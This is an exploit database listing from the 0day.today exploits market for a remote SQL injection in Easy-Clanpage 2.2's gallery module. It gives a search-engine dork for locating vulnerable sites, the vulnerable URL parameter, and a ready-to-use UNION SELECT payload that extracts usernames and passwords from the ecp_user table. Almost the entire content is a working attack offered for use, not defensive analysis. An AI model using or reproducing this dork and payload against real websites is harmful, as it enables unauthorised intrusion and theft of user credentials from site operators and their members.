[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability

Author
n3w7u
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2751
Category
web applications
Date add
18-03-2008
Platform
unsorted
=========================================================
Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability
=========================================================



.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

 ~ Easy-Clanpage v2.2 (gallery) Remote SQL Injection Vulnerability ~


[+] Dork: "Easy-Clanpage v2.2"

.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vuln File: /modules/gallery/index.php

[+] Exploit: http://[host]/[path]/?section=gallery&action=kate&id=

[+] Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*



#  0day.today [2024-11-16]  #